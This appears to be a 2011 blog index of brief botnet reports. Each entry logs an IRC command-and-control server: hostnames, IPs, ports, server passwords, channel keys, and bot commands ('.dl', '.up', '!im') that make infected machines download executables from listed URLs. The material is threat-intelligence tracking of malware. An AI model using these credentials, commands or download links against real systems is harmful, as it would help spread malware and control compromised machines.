pulpin.upda.in(botnet hosted in United States Dallas Colo4dallas Lp)

By Pig, March 4, 2011
Uncategorized

DNS Lookup Host Name IP Address dell-d3e62f7e26 10.1.10.2 pulpin.upda.in 174.136.0.29 pulpin.sch.in schn.no-ip.info 174.129.88.121 Outgoing connection to remote server: pulpin.upda.in TCP port 666 Outgoing connection to remote server: schn.no-ip.info TCP port 666 Outgoing connection to remote server: pulpin.upda.in TCP port 666 Remote Host Port Number 173.192.205.192 80 70.38.98.237 80 70.38.98.238 80 174.136.0.29 666 PASS dandodando MODERead more...

163.20.108.31(botnet hosted in Taiwan Taipei Tanet Taipei Nccu Regional Network)

By Pig, March 1, 2011
Uncategorized

Remote Host Port Number 163.20.108.31 1863 208.75.230.43 80 * The data identified by the following URLs was then requested from the remote web server: o http://www.freewebtown.com/newlow/im.exe o http://www.freewebtown.com/newlow/photo.exe JOIN #newbin# abc PONG 422 PRIVMSG #newbin# :[Download]: Downloading File From: http://www.freewebtown.com/newlow/im.exe, To: C:Documents and SettingsUserNameApplication Dataqghumeaylnlfdxfircvs85.exe PRIVMSG #newbin# :[Download]: File Successfully Downloaded To: C:Documents and SettingsUserNameApplicationRead more...

59.61.93.126(botnet hosted in China Xiamen Chinanet Fujian Province Network)

By Pig, March 1, 2011
Uncategorized

Remote Host Port Number 59.61.93.126 81 NICK n[USA|XP]7424992 USER s “” “lol” :s JOIN #newbin# JOIN #bin# abc PONG 422 Now talking in #newbin# Topic On: [ #newbin# ] [ .dl http://www.freewebtown.com/newlow/im.exe ] Topic By: [ rm- ] (rm) !im http://tiny.cc/facebook-photo-18-02-2011 infos about hosting: http://whois.domaintools.com/59.61.93.126

dns.googleure.com(botnet hosted in Russian Federation 2×4.ru Network)

By Pig, February 26, 2011
Uncategorized

dns.googleure.com DNS_TYPE_A 92.241.164.227 92.241.164.227:1234 Nick: n{US|XPa}xvwpyyv Username: xvwpyyv Server Pass: null Joined Channel: #!ngr! with Password ngrBot Joined Channel: #US Channel Topic for Channel #!ngr!: “.mod pdef off .s .j -c IT,ITA,ES,ESP,FR,FRA #uz4 .up http://jeanie.ws/new.exe 3c62c54ff04ae4af8262ae4d5e2683c7” Private Message to Channel #!ngr!: “[d=”http://jeanie.ws/new.exe” s=”278528 bytes”] Updated bot file “C:Documents and SettingsAdministratorApplication DataDekfki.exe”” infos about hosting: http://whois.domaintools.com/92.241.164.227

nice.niceshot.in(botnet hosted in Netherlands Rijndata B.v)

By Pig, February 25, 2011
Uncategorized

Remote Host Port Number 46.21.169.42 6567 PASS s1m0n3t4 MODE [SI|USA|00|P|57896] -ix JOIN #yur# c1rc0dusoleil PONG Apple.Network NICK [SI|USA|00|P|57896] USER XP-0495 * 0 :COMPUTERNAME MODE [SI|USA|00|P|69385] -ix JOIN #wal# c1rc0dusoleil PRIVMSG #wal# :[Dl]: File download: 96.0KB to: C:DOCUME~1UserNameLOCALS~1Temperaseme_12581.exe @ 96.0KB/sec. QUIT [Update]: Updating to new bin. NICK [SI|USA|00|P|48857] USER XP-5184 * 0 :COMPUTERNAME MODE [SI|USA|00|P|48857] -ixRead more...

77.79.7.106(botnet hosted in Lithuania Webhosting Collocation Services)

By Pig, February 25, 2011
Uncategorized

Remote Host Port Number 174.37.72.72 80 204.0.5.56 80 216.178.38.224 80 63.135.80.46 80 69.63.181.16 80 77.79.7.106 6663 PASS xxx MODE NEW-[USA|00|P|01494] -ix JOIN #!nn! test PONG irc.priv8net.com NICK NEW-[USA|00|P|01494] USER XP-6931 * 0 :COMPUTERNAME Now talking in #!nn! Topic On: [ #!nn! ] [ .m.s|.m.e Foto 😀 http://apps.facebook.com/phootosofyour/photo.php?= ] Topic By: [ wd38 ] Topic: wd38Read more...